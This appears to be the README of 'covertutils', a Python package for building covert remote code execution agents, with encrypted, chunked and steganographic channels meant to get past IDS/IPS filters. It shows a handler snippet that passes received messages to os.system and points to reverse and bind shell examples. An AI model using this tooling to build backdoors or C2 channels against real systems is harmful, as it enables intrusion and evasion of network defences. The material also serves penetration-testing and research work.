A framework for Remote Code Execution Agent programming.
Blog Post in Securosophy describing some internals
This python package automatically handles all communication channel options, like encryption, chunking, steganography, etc.
With all those set with a few lines of code, a programmer can spend time creating the actual payloads, persistense mechanisms, shellcodes and generally more creative stuff!!
The security programmers can stop re-inventing the wheel by implementing encryption mechanisms both agent-side and handler-side to spend their time to develop more versatile agents, and generally feature-full shells!
Yes, python, and more specifically python 2.7 only, for the time being...
NO! Absolutely no dependencies, only pure python built-ins! The entropy
package is required for the tests
though.
This is a package's requirement, to ensure good flow when compiling in executable binaries.
Messages are all things that mean something to the listener. Messages travel through communication channels, and they have to be unaware of the channel they are travelling in. In other words, messages have to be independent of the mean of their transportation.
- If the communication channel can handle low length byte-chunks per "burst", the message has to be chunked.
- If the communication channel filters certain byte arrays (IDS/IPS, NextGen Firewalls).
The Stream is a tag that gives certain context to the message. Can be defined and used for arbitrary reasons. Streams, for example, can be used to separate Shell Commands
from shellcode
messages.
Orchestrators are the core of data manipulation in covertutils
. They handle all data transformation methods to translate raw chunks of data into Stream-Message pairs.
Handlers tie together the raw byte input/output with the orchestrators
to provide an interface of:
onChunk()
onMessage()
onNotRecognized()
def onMessage( message, stream ) :
if stream == 'shell' :
os.system( message )
A shell interface with prompt and stream
control can be spawned from a Handler
instance with:
shell = PrintShell( handler )
shell.start()
(covertutils v0.2.1)[control]>
(covertutils v0.2.1)[control]> !main
(covertutils v0.2.1)[main]>
<Ctrl-C>
Really Control-C [y/N]? y
Aborted by the user...
Networking is not handled by covertutils
, as python provides great built-in networking API (directly inherited from C). The only requirements for covertutils
Handlers are 2 functions wrapping the raw data sending and receiving.
Just pass a send( raw )
and a recv()
function to a Handler
and you have a working One-Time-Pad encrypted, bandwidth aware, protocol independent, password protected channel.
Sample TCP/UDP Reverse Shells and TCP Bind Shell scripts can be found in examples/
directory.
Certainly! All pull requests that are tested and do not break the existing tests will be accepted! Especially Pull Requests towards Python2/Python3 compatibility will be greatly appreciated!